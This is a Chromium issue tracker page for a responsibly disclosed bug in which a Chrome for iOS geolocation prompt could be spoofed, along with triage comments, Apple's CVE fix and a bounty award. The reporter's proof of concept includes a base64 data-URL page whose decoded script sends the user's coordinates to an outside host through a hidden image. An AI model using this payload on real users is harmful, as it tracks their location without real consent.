Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 494987 Security: Geolocation API Spoof in Chrome For iOS
Starred by 2 users Reported by xis...@gmail.com, Jun 1 2015 Back to list
Status: Fixed
Owner:
Closed: Jun 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 2
Type: Bug-Security



Sign in to add a comment
AFFECTED PRODUCTS
--------------------
IPhone:
Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/42.0.2311.47 Mobile/12F70 Safari/600.1.4 (000178)

IPad:
Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/42.0.2311.47 Mobile/12F69 Safari/600.1.4 (000134)

DESCRIPTION
--------------------
In the Chrome for IOS,write "data:text/html,…… geolocation API……“ in the URL address bar。Geolocation API will pop up a location authorization dialog ,the domain will be displayed as":// " .An attacker can make this location authorization dialog appear in another domain to spoof user.When the user click allow, the location will be acquired by the attacker.

PoC
--------------------

<a href="data:text/html;base64,PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ +CjxtZXRhIGNoYXJzZXQ9dXRmLTggLz4KPHRpdGxlPmdlb2xvY2F0aW9uPC90aXRsZT4KPGJvZHk+CjxzY3JpcHQ +CmZ1bmN0aW9uIHN1Y2Nlc3MocG9zaXRpb24pIHsKZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3JlbW90ZScpLnNyYz0iaHR0cDovL3hpc2lnci5jb20vdGVzdC9nZW8v Z2V0LnBocD9nZW9sb2NhdGlvbj0iKyItLS0tLS0iK2VuY29kZVVSSUNvbXBvbmVudChwb3NpdGlvbi5jb29yZHMubGF0aXR1ZGUpKyIsIitlbmNvZGVVUklDb21wb25lb nQocG9zaXRpb24uY29vcmRzLmxvbmdpdHVkZSk7CiB9Cm5hdmlnYXRvci5nZW9sb2NhdGlvbi5nZXRDdXJyZW50UG9zaXRpb24oc3VjY2Vzcyk7Cjwvc2NyaXB0Pgo8aW 1nIGlkPSJyZW1vdGUiIHNyYz0iIiB3aWR0aD0wIGhlaWdodD0wPgo8L2JvZHk+CjwvaHRtbD4=" target="go" onclick="fake()"><h1>click  me</h1></a>

<script>
    function fake() {
        if (navigator.userAgent.indexOf("iPhone") > -1) {
            setTimeout("gs()", 0);
        }
        if (navigator.userAgent.indexOf("iPad") > -1) {
            setTimeout("gs()", 200);
        }
    }
    function gs() {
        window.open('http://www.google.com', 'go');
    }
</script>

Base64 decode:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset=utf-8 />
<title>geolocation</title>
<body>
<script>
function success(position) {
document.getElementById('remote').src="http://xisigr.com/test/geo/get.php?geolocation="+"------"+encodeURIComponent(position.coords.latitude)+","+encodeURIComponent(position.coords.longitude);
 }
navigator.geolocation.getCurrentPosition(success);
</script>
<img id="remote" src="" width=0 height=0>
</body>
</html>

Online Demo:http://xisigr.com/test/geo/geo.html
user’s location: http://xisigr.com/test/geo/info.txt

CREDIT
--------------------
This vulnerability was discovered by xisigr of Tencent's Xuanwu LAB(http://www.tencent.com).
Email:xisigr@gmail.com

 
Labels: Security_Severity-Low
Owner: lgar...@chromium.org
lgarron can you reproduce and triage this?  Thanks
lgarron can you reproduce and triage this?  Thanks
Cc: pinkerton@chromium.org palmer@chromium.org
Labels: OS-iOS Cr-Security-UX Cr-Blink-Location Security_Impact-Stable
Status: Assigned
Summary: Security: Geolocation API Spoof in Chrome For iOS (was: Security: Geolocation API Spoof in Chrome For IOS)
Cc: stuartmorgan@chromium.org
Labels: -Cr-Blink-Location Cr-Mobile-WebView-Glue
+stuart, fixing labels
Geo auth is 100% controlled by UIWebView, so it's almost certain the only thing that we can do is file a Radar.

WKWebView doesn't delegate these either (which we have an existing Radar for), so I don't think we can do anything there either.
Status: ExternalDependency
Sounds like ExternalDependency, then?
Filed rdar://21289208
Comment 8 by laforge@google.com, Aug 24 2015
Labels: Pri-2
Adding default Pri-2
Comment 9 by xis...@gmail.com, Mar 22 2016
About the security content of iOS 9.3
https://support.apple.com/en-us/HT206166

WebKit
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may reveal a user's current location
Description: An issue existed in the parsing of geolocation requests. This was addressed through improved validation of the security origin for geolocation requests.
CVE-ID
CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)

Status: Fixed
Based on c#9 this is fixed, right? Please update this if that is incorrect.
Project Member Comment 11 by sheriffbot@chromium.org, Jun 11 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid Reward-500
Congratulations, the panel has decided to award $500 for this bug!  Our finance team will be in touch in the next few weeks with more details.
Labels: -reward-unpaid reward-inprocess
Project Member Comment 15 by sheriffbot@chromium.org, Sep 17 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 16 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 17 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label
Sign in to add a comment